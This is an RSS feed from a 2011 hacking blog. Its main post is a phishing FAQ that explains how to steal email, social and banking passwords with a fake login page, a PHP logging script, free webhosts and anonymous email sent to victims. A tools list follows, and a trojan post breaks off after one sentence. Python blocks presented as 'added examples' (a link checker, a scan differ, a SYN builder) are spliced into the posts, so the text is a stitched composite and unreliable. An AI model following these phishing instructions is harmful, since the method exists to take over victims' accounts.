<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-1548500639891694165</atom:id><lastBuildDate>Thu, 16 Feb 2012 11:15:34 +0000</lastBuildDate><category>hacking tutorials</category><category>iphone 4g</category><title>Hack My Stuff</title><description>Learn how to Hack Ethically! Know more about Cyber Security and Technology. Get cool Computer Tricks, Tips, How-To guides and more from experts.</description><link>http://hackmystuff.blogspot.com/</link><managingEditor>noreply@blogger.com (eracnid)</managingEditor><generator>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/blogspot/UlQki" /><feedburner:info uri="blogspot/ulqki" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:copyright>Hackmystuff</media:copyright><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-6673640435201941680</guid><pubDate>Wed, 01 Jun 2011 09:37:00 +0000</pubDate><atom:updated>2011-06-01T02:37:16.926-07:00</atom:updated><title>Phishing to Hack Email Account Passwords</title><description>&lt;span style="font-weight: bold;"&gt;What is Phishing and how to use it for hacking?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
1. First of all lets clear &lt;span style="font-weight: bold;"&gt;What is Phishing&lt;/span&gt;:&lt;br /&gt;
&lt;br /&gt;
Basicly  phishing is way of sending a fake page to victim which resembles   the  original page and ask the victim to login with the provided   modified  page called as phisher. This the most popular method used by   hackers  to hack email account passwords like myspace, gmail, yahoo,   orkut,  facebook, etc.&lt;br /&gt;
&lt;br /&gt;
2. &lt;span style="font-weight: bold;"&gt;Does Phishing help in hacking email passwords?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
This was the most basic question I received. No doubt the reader is a newbie, and that is why I have included it here; helping newbies is my main purpose. The answer is "Yes, phishing is meant for stealing email passwords." It works because the victim types the password into the fake page, not because of any weakness in the email provider.&lt;br /&gt;
&lt;br /&gt;
3. &lt;span style="font-weight: bold;"&gt;Which email passwords can be hacked using Phishing?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Phishing can be used to capture any email password or any other online account password: an email account like Hotmail, Gmail or Yahoo; a social networking account like MySpace, Orkut or Facebook; a banking account; a file sharing account; or any other account you want.&lt;br /&gt;
&lt;br /&gt;
4. &lt;span style="font-weight: bold;"&gt;How do I perform Phishing?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Phishing is one of the easiest methods because it needs no software exploit. You only have to understand the parts involved, which the rest of this FAQ covers: a copy of the login page, the script that records what is typed into it, a webhost for both, and a way to get the victim to open the link.&lt;br /&gt;
&lt;br /&gt;
5. &lt;span style="font-weight: bold;"&gt;What are webhosts?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Webhosts, in short, offer free web space where we can upload the phisher we created. The phisher is a fake login page that we build and then have to put on the internet, so we need some space on the internet for it, and that is what such free webhosts provide.&lt;br /&gt;
&lt;br /&gt;
I would recommend the following webhosts:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href="http://www.yourfreehosting.net/"&gt;www.yourfreehosting.net&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.drivehq.com/"&gt;www.drivehq.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.110mb.com/"&gt;www.110mb.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.t35.com/"&gt;www.t35.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.esmartstart.com/"&gt;www.esmartstart.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
6. &lt;span style="font-weight: bold;"&gt;Why can't I upload write.php?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
To upload the write.php file, your webhost must support PHP. Try the webhosts listed in Q.5; they all support PHP.&lt;br /&gt;
&lt;br /&gt;
7. &lt;span style="font-weight: bold;"&gt;Why can't I run the Phisher Creator software on my computer?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
To run the Phisher Creator software, your computer must have the necessary runtime libraries installed. Install the library files package and also the .NET Framework.&lt;br /&gt;
&lt;br /&gt;
8. &lt;span style="font-weight: bold;"&gt;How do I send the phisher link to the victim?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Get the Anonymous Emailer software, create a fake email and put the phisher link in it. Ask the victim to log in to his account using this link. Also use your own judgement about what will make him log in through the phisher you sent.&lt;br /&gt;
&lt;br /&gt;
9. &lt;span style="font-weight: bold;"&gt;Why don't I get the passes.txt file?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The passes.txt file is created only after a victim logs in through the phisher you sent. If you are testing it yourself, log in through the phisher and then open the file manager of your FTP account; you will see the passes.txt file there. If the file is not present, try refreshing the page. If you still do not get the passes.txt file, do one of the following:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Re-login using phisher.&lt;/li&gt;
&lt;li&gt;Change your webhost.&lt;/li&gt;
&lt;li&gt;Re-start from beginning.&lt;/li&gt;
&lt;/ul&gt;Sorry for this, but it has helped many visitors who did not know where they had made a mistake, so it is always best to restart the process.&lt;br /&gt;
&lt;br /&gt;
10. &lt;span style="font-weight: bold;"&gt;How do I get my phisher link?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the File Manager and upload the phisher created by Phisher Creator. Click the uploaded "index.htm" file and you will see the fake page. The URL in the address bar is your phisher link; send this link to your victim. Note that because the page sits on a free webhost, the address bar shows that host's domain and not the real site's, and that is exactly what a careful victim notices.&lt;br /&gt;
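A check a defender (or a cautious recipient) can run on such links, added here as an example that is not part of the original post: the phisher lives under the free webhost's domain, so a URL that mentions gmail or yahoo but is served from 110mb.com or t35.com gives itself away. The sample URLs are constructed, the brand table and the two-label suffix set are my own deliberate simplification (a real check uses the Public Suffix List), and all function names are my own.&lt;br /&gt;

```python
"""Flag links whose URL names one brand but whose registrable domain belongs to someone else.

Added example, not code from the original post. Sample URLs are constructed; BRANDS and
TWO_LABEL_SUFFIXES are assumptions that a real deployment would replace with the
Public Suffix List and a maintained brand table.
"""
from urllib.parse import urlsplit

# Brand keyword -> domains that legitimately serve that brand's login page (constructed, incomplete).
BRANDS = {
    "gmail": {"google.com", "gmail.com"},
    "yahoo": {"yahoo.com", "yahoo.co.uk"},
    "facebook": {"facebook.com"},
    "orkut": {"orkut.com", "google.com"},
}

# Two-label public suffixes this toy check knows about; the real list is far longer.
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.in", "com.br"}


def registrable_domain(host):
    """Return the part of the hostname its owner actually registered (e.g. 110mb.com)."""
    labels = host.lower().rstrip(".").split(".")
    keep = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def brand_mismatches(url):
    """List (brand, owner) pairs where a brand name appears anywhere in the URL
    (subdomain, path or query) but the page is served from a domain that brand does not own."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    owner = registrable_domain(host)
    haystack = (host + parts.path + "?" + parts.query).lower()
    hits = []
    for brand, legit in BRANDS.items():
        if brand in haystack and owner not in legit:
            hits.append((brand, owner))
    return hits


def suspicious_links(urls):
    """Return only the URLs that trip the check, each with its reasons attached."""
    out = []
    for url in urls:
        why = brand_mismatches(url)
        if why:
            out.append((url, why))
    return out


# Constructed examples: the shapes this FAQ produces (index.htm on a free host) next to real logins.
SAMPLE_LINKS = [
    "http://www.110mb.com/johndoe/gmail/index.htm",
    "http://login.yahoo.com.t35.com/index.htm",
    "https://mail.google.com/mail/",
    "https://www.facebook.com/login.php",
    "http://drivehq.com/file/df.aspx/publish/johndoe/facebook/index.htm",
    "https://login.yahoo.co.uk/",
]

if __name__ == "__main__":
    for url, why in suspicious_links(SAMPLE_LINKS):
        print(url, "->", why)
```

The second and last sample show the two things the naive "look at the hostname" advice gets wrong: a brand name stuffed into a subdomain still ends in the host's own domain, and a legitimate two-label suffix like yahoo.co.uk must not be flagged.&lt;br /&gt;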
&lt;br /&gt;
11. &lt;span style="font-weight: bold;"&gt;Why isn't phishing working for me?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
I have received many questions like this. I helped many readers and finally reached the conclusion that most of them had not read my article completely and carefully. So read the article completely and carefully; this is the most common mistake readers make.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
That's it. I hope most of your doubts about phishing are now cleared up. This article is meant only for you.&lt;br /&gt;
&lt;br /&gt;
Enjoy Phishing to hack email password...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-6673640435201941680?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/RGRBFxffN7Q" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/RGRBFxffN7Q/phishing-to-hack-email-account.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/06/phishing-to-hack-email-account.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-7092005492518227144</guid><pubDate>Wed, 01 Jun 2011 09:24:00 +0000</pubDate><atom:updated>2011-06-01T02:24:59.546-07:00</atom:updated><title>Security/Hacking Tools &amp; Utilities</title><description>&lt;div style="color: black;"&gt;&lt;i&gt;&lt;strong&gt;&amp;nbsp;Top Security/Hacking Tools &amp;amp; Utilities&lt;/strong&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="color: black;"&gt;&lt;strong&gt;&amp;nbsp;&lt;i&gt;Here are some of the best tools, which may/maynot be useful for your purpose but these tools are good enough to learn the different ways of Hacking.&lt;/i&gt;&lt;/strong&gt;&lt;/div&gt;&lt;strong&gt; &lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;1. Nmap&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
I think everyone has heard of this one; it recently evolved into the 4.x series.&lt;br /&gt;
Nmap (“Network Mapper”) is a free open source utility for network  exploration or security auditing. It was designed to rapidly scan large  networks, although it works fine against single hosts. Nmap uses raw IP  packets in novel ways to determine what hosts are available on the  network, what services (application name and version) those hosts are  offering, what operating systems (and OS versions) they are running,  what type of packet filters/firewalls are in use, and dozens of other  characteristics.&lt;br /&gt;
&lt;br /&gt;
Nmap runs on most types of computers and both console  and graphical versions are available. Nmap is free and open source.&lt;br /&gt;
&lt;br /&gt;
It can be used by beginners (-sT, a plain TCP connect scan that needs no raw sockets or root) and by pros alike (--packet-trace, which shows every packet sent and received). A very versatile tool, once you fully understand the results.&lt;br /&gt;
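Added example, not code from the original post or from the Nmap project: Nmap's greppable output (-oG) is the format you feed to scripts, and the thing a practitioner most often wants from repeated scans is the delta. The parser below reads two constructed -oG files for hosts in the 192.0.2.0/24 documentation range and reports the ports that are open in the later scan but were not open in the baseline. Function and variable names are my own.&lt;br /&gt;

```python
"""Parse nmap greppable (-oG) output and diff two scans for newly exposed ports.

Added example, not code from the original post or from the Nmap project. The scan
output below is constructed by hand in the -oG format (tab-separated fields, one
'Ports:' line per host); hosts are in the documentation range 192.0.2.0/24.
"""
import re

# Constructed: a baseline scan and a later scan of the same hosts.
BASELINE = """\
# Nmap 5.51 scan initiated Wed Jun  1 09:00:00 2011 as: nmap -sV -oG base.gnmap 192.0.2.0/29
Host: 192.0.2.10 (web.example)\tStatus: Up
Host: 192.0.2.10 (web.example)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1/, 80/open/tcp//http//Apache httpd 2.2.15/\tIgnored State: closed (998)
Host: 192.0.2.11 ()\tStatus: Up
Host: 192.0.2.11 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1/\tIgnored State: filtered (999)
# Nmap done at Wed Jun  1 09:02:10 2011 -- 8 IP addresses (2 hosts up) scanned in 130.12 seconds
"""

LATER = """\
# Nmap 5.51 scan initiated Thu Jun  2 09:00:00 2011 as: nmap -sV -oG later.gnmap 192.0.2.0/29
Host: 192.0.2.10 (web.example)\tStatus: Up
Host: 192.0.2.10 (web.example)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1/, 80/open/tcp//http//Apache httpd 2.2.15/, 3306/open/tcp//mysql//MySQL 5.1.52/\tIgnored State: closed (997)
Host: 192.0.2.11 ()\tStatus: Up
Host: 192.0.2.11 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3p1/, 2999/open/tcp//remoteware-2///\tIgnored State: filtered (998)
# Nmap done at Thu Jun  2 09:02:30 2011 -- 8 IP addresses (2 hosts up) scanned in 150.40 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")


def parse_gnmap(text):
    """Return {ip: {port: (proto, service, version)}} for every open port in -oG output.

    A port entry is port/state/proto/owner/service/rpc-info/version/ separated by '/'.
    """
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                        # comment lines carry no ports
        ip, rest = m.group(1), m.group(3)
        hosts.setdefault(ip, {})
        for field in rest.split("\t"):
            if not field.startswith("Ports: "):
                continue                    # 'Status: Up' and 'Ignored State:' fields
            for entry in field[len("Ports: "):].split(", "):
                parts = entry.split("/")
                port, state, proto = int(parts[0]), parts[1], parts[2]
                if state == "open":
                    hosts[ip][port] = (proto, parts[4], parts[6])
    return hosts


def new_exposures(baseline_text, later_text):
    """List (ip, port, service, version) for open ports seen in the later scan but not in the baseline."""
    before, after = parse_gnmap(baseline_text), parse_gnmap(later_text)
    findings = []
    for ip, ports in sorted(after.items()):
        known = before.get(ip, {})
        for port in sorted(ports):
            if port not in known:
                proto, service, version = ports[port]
                findings.append((ip, port, service, version))
    return findings


if __name__ == "__main__":
    for ip, port, service, version in new_exposures(BASELINE, LATER):
        print("NEW %s:%d %s %s" % (ip, port, service, version))
```

Run the same nmap -sV -oG command on a schedule and keep the files; the diff is short enough to read every day, which the full scan output is not.&lt;br /&gt;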
&lt;br /&gt;
&lt;a href="http://www.insecure.org/nmap/download.html"&gt;Get Nmap Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;2. Nessus Remote Security Scanner&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Recently went closed source, but is still free for home use. Works with a client-server framework.&lt;br /&gt;
Nessus is the world’s most popular vulnerability scanner used in over  75,000 organizations world-wide. Many of the world’s largest  organizations are realizing significant cost savings by using Nessus to  audit business-critical enterprise devices and applications.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.nessus.org/download/"&gt;Get Nessus Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span id="more-3"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;strong&gt;3. John the Ripper&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Yes, JTR 1.7 was recently released!&lt;br /&gt;
John the Ripper is a fast password cracker, currently available for  many flavors of Unix (11 are officially supported, not counting  different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary  purpose is to detect weak Unix passwords. Besides several crypt(3)  password hash types most commonly found on various Unix flavors,  supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM  hashes, plus several more with contributed patches.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.openwall.com/john/"&gt;You can get JTR Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;4. Nikto&lt;/strong&gt;&lt;br /&gt;
Nikto is an Open Source (GPL) web server scanner which performs  comprehensive tests against web servers for multiple items, including  over 3200 potentially dangerous files/CGIs, versions on over 625  servers, and version specific problems on over 230 servers. Scan items  and plugins are frequently updated and can be automatically updated (if  desired).&lt;br /&gt;
Nikto is a good CGI scanner; some other tools go well with it (focused on HTTP fingerprinting, Google hacking, information gathering, etc.), but those deserve an article of their own.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.cirt.net/code/nikto.shtml"&gt;Get Nikto Here&lt;/a&gt;&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;strong&gt;5. SuperScan&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update  of the highly popular Windows port scanning tool, SuperScan.&lt;br /&gt;
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;amp;subcontent=/resources/proddesc/superscan4.htm"&gt;Get SuperScan Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;6. p0f&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;machines that connect to your box (SYN mode),&lt;/li&gt;
&lt;li&gt;machines you connect to (SYN+ACK mode),&lt;/li&gt;
&lt;li&gt;machines you cannot connect to (RST+ mode),&lt;/li&gt;
&lt;li&gt;machines whose communications you can observe.&lt;/li&gt;
&lt;/ul&gt;Basically it can fingerprint anything just by listening; it doesn't make &lt;strong&gt;ANY&lt;/strong&gt; active connections to the target machine. It keys on values the sender's TCP/IP stack chooses on its own, such as the initial TTL, window size, DF bit, packet size and the order of TCP options.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://lcamtuf.coredump.cx/p0f/p0f.shtml"&gt;Get p0f Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;7. Wireshark (Formerly Ethereal)&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that  lets you capture and interactively browse the contents of network  frames. The goal of the project is to create a commercial-quality  analyzer for Unix and to give Wireshark features that are missing from  closed-source sniffers.&lt;br /&gt;
Works great on both Linux and Windows (with a GUI), easy to use and  can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.wireshark.org/"&gt;Get Wireshark Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div align="center"&gt; &lt;/div&gt;&lt;strong&gt;8. Yersinia&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Yersinia is a network tool designed to take advantage of some weaknesses in different Layer 2 protocols. It aims to be a solid framework for analyzing and testing deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1Q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).&lt;br /&gt;
The best Layer 2 kit there is.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://yersinia.sourceforge.net/"&gt;Get Yersinia Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;9. Eraser&lt;/strong&gt;&lt;br /&gt;
Eraser is an advanced security tool (for &lt;em&gt;Windows&lt;/em&gt;), which  allows you to completely remove sensitive data from your hard drive by  overwriting it several times with carefully selected patterns. Works  with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software  and its source code is released under GNU General Public License.&lt;br /&gt;
An excellent tool for keeping your data really safe, if you’ve  deleted it..make sure it’s really gone, you don’t want it hanging around  to bite you in the ass.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.heidi.ie/eraser/download.php"&gt;Get Eraser Here.&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;10. PuTTY&lt;/strong&gt;&lt;br /&gt;
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix  platforms, along with an xterm terminal emulator. A must have for any  h4x0r wanting to telnet or SSH from Windows without having to use the  crappy default MS command line clients.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.chiark.greenend.org.uk/%7Esgtatham/putty/"&gt;Get PuTTY Here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;11. LCP&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Main purpose of LCP program is user account passwords auditing and  recovery in Windows NT/2000/XP/2003. Accounts information import,  Passwords recovery, Brute force session distribution, Hashes computing.&lt;br /&gt;
A good free alternative to L0phtcrack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.lcpsoft.com/english/download.htm"&gt;Get LCP Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;12. Cain and Abel&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
My personal favourite for password cracking of any kind.&lt;br /&gt;
Cain &amp;amp; Abel is a password recovery tool for Microsoft Operating  Systems. It allows easy recovery of various kind of passwords by  sniffing the network, cracking encrypted passwords using Dictionary,  Brute-Force and Cryptanalysis attacks, recording VoIP conversations,  decoding scrambled passwords, revealing password boxes, uncovering  cached passwords and analyzing routing protocols. The program does not  exploit any software vulnerabilities or bugs that could not be fixed  with little effort.&lt;br /&gt;
&lt;a href="http://www.oxid.it/cain.html"&gt;Get Cain and Abel Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;13. Kismet&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Kismet is an 802.11 layer2 wireless network detector, sniffer, and  intrusion detection system. Kismet will work with any wireless card  which supports raw monitoring (rfmon) mode, and can sniff 802.11b,  802.11a, and 802.11g traffic.&lt;br /&gt;
A good wireless tool as long as your card supports rfmon (look for an Orinoco Gold).&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.kismetwireless.net/download.shtml"&gt;Get Kismet Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;14. NetStumbler&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Yes, a decent wireless tool for Windows! Sadly not as powerful as its Linux counterparts, but it's easy to use and has a nice interface, good for the basics of war-driving.&lt;br /&gt;
NetStumbler is a tool for Windows that allows you to detect Wireless  Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has  many uses:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Verify that your network is set up the way you intended.&lt;/li&gt;
&lt;li&gt;Find locations with poor coverage in your WLAN.&lt;/li&gt;
&lt;li&gt;Detect other networks that may be causing interference on your network.&lt;/li&gt;
&lt;li&gt;Detect unauthorized “rogue” access points in your workplace.&lt;/li&gt;
&lt;li&gt;Help aim directional antennas for long-haul WLAN links.&lt;/li&gt;
&lt;li&gt;Use it recreationally for WarDriving.&lt;/li&gt;
&lt;/ul&gt;&lt;a href="http://www.stumbler.net/"&gt;Get NetStumbler Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;15. hping&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
To finish off, something a little more advanced if you want to test your TCP/IP packet-monkey skills.&lt;br /&gt;
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired by the Unix ping command, but hping isn't only able to send ICMP echo requests. It supports the TCP, UDP, ICMP and raw-IP protocols, has a traceroute mode, the ability to send files over a covert channel, and many other features.&lt;br /&gt;
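hping and p0f above are two halves of the same idea, so one added example (not code from the original post, from hping or from p0f) covers both: build_syn assembles an IPv4/TCP SYN with correct checksums the way hping does, and fingerprint reads back the fields p0f v2 keys on (window, TTL, DF, size, option order) into a p0f-style signature. Addresses are from the documentation ranges, the option layout is constructed to look like a Linux SYN, and every name is my own. Sending the packet would need a raw socket and root; the block only builds and inspects bytes, which is all a passive fingerprinter ever sees.&lt;br /&gt;

```python
"""Assemble a raw TCP SYN the way hping does, then read a p0f-style signature from it.

Added example, not code from the original post, from hping or from p0f. Every name
is my own; the addresses come from the 192.0.2.0/24 and 198.51.100.0/24 documentation
ranges and the option values are constructed to resemble a Linux SYN. Bit tests use
shifts and modulo rather than bitwise operators.
"""
import socket
import struct


def ones_complement_sum(data):
    """Internet checksum (RFC 1071): complement of the one's complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                                 # fold carries back into 16 bits
        total = (total >> 16) + (total % 0x10000)
    return 0xFFFF - total


def build_syn(src, dst, sport, dport, ttl=64, window=29200, mss=1460, tsval=123456):
    """Return IPv4 header + TCP SYN with no payload, both checksums filled in."""
    options = (struct.pack("!BBH", 2, 4, mss)              # MSS
               + b"\x04\x02"                               # SACK permitted
               + struct.pack("!BBII", 8, 10, tsval, 0)     # timestamps (TSval, TSecr)
               + b"\x01"                                   # NOP
               + struct.pack("!BBB", 3, 3, 7))             # window scale 7
    options += b"\x00" * ((4 - len(options) % 4) % 4)      # pad to a 32-bit boundary
    doff = 5 + len(options) // 4                           # TCP header length in 32-bit words
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, doff * 16, 0x02, window, 0, 0) + options
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", ones_complement_sum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, ttl, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))   # 0x4000 sets DF
    ip = ip[:10] + struct.pack("!H", ones_complement_sum(ip)) + ip[12:]
    return ip + tcp


def checksums_ok(packet):
    """True when the IPv4 and TCP checksums both verify (a correct header sums to zero)."""
    ihl = (packet[0] % 16) * 4
    ip, tcp = packet[:ihl], packet[ihl:]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return ones_complement_sum(ip) == 0 and ones_complement_sum(pseudo + tcp) == 0


def initial_ttl(observed):
    """p0f's guess at the sender's starting TTL: the next common default at or above the observed one."""
    for candidate in (32, 64, 128, 255):
        if candidate >= observed:
            return candidate
    return 255


def fingerprint(packet):
    """Extract the fields p0f v2 keys on and render them as window:ttl:df:size:options."""
    ihl = (packet[0] % 16) * 4
    df = (packet[6] >> 6) % 2                              # DF is the 0x40 bit of byte 6
    ttl = packet[8]
    tcp = packet[ihl:]
    sport, dport, seq, ack, doff_byte, flags, window = struct.unpack("!HHIIBBH", tcp[:16])
    opts = tcp[20:(doff_byte >> 4) * 4]
    names, i = [], 0
    while len(opts) > i:
        kind = opts[i]
        if kind == 0:                                      # end of option list
            break
        if kind == 1:                                      # NOP carries no length byte
            names.append("N")
            i += 1
            continue
        if i + 1 >= len(opts) or opts[i + 1] in (0, 1):    # truncated or malformed option
            break
        length = opts[i + 1]
        if kind == 2:
            names.append("M%d" % struct.unpack("!H", opts[i + 2:i + 4])[0])
        elif kind == 3:
            names.append("W%d" % opts[i + 2])
        elif kind == 4:
            names.append("S")
        elif kind == 8:
            names.append("T")
        else:
            names.append("?%d" % kind)
        i += length
    sig = {"window": window, "ttl": ttl, "initial_ttl": initial_ttl(ttl), "df": df,
           "size": len(packet), "syn": (flags >> 1) % 2 == 1, "options": names}
    sig["signature"] = "%d:%d:%d:%d:%s" % (window, ttl, df, len(packet), ",".join(names))
    return sig


if __name__ == "__main__":
    pkt = build_syn("192.0.2.10", "198.51.100.20", 40000, 80)
    print(checksums_ok(pkt), fingerprint(pkt)["signature"])
```

The signature comes out as 29200:64:1:60:M1460,S,T,N,W7, which is the shape of a p0f v2 entry. Two things worth noticing: the observed TTL is rounded up to a default (a packet arriving with TTL 57 is attributed to a 64-TTL stack seven hops away), and a single flipped byte anywhere in the header makes checksums_ok fail, which is how a capture tool tells a real packet from a corrupted or hand-assembled one.&lt;br /&gt;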
&lt;br /&gt;
&lt;a href="http://www.hping.org/"&gt;Get hping Here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1548500639891694165-7092005492518227144?l=hackmystuff.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/UlQki/~4/TQ7DEzAN3aY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/TQ7DEzAN3aY/securityhacking-tools-utilities.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>1</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2011/06/securityhacking-tools-utilities.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-3605620016488434224</guid><pubDate>Sun, 08 May 2011 22:44:00 +0000</pubDate><atom:updated>2011-05-08T15:44:00.704-07:00</atom:updated><title>Simple trojan in vb ..... (only for learning)</title><description>Writing a Trojan is a lot easier than most people think. All it really  involves 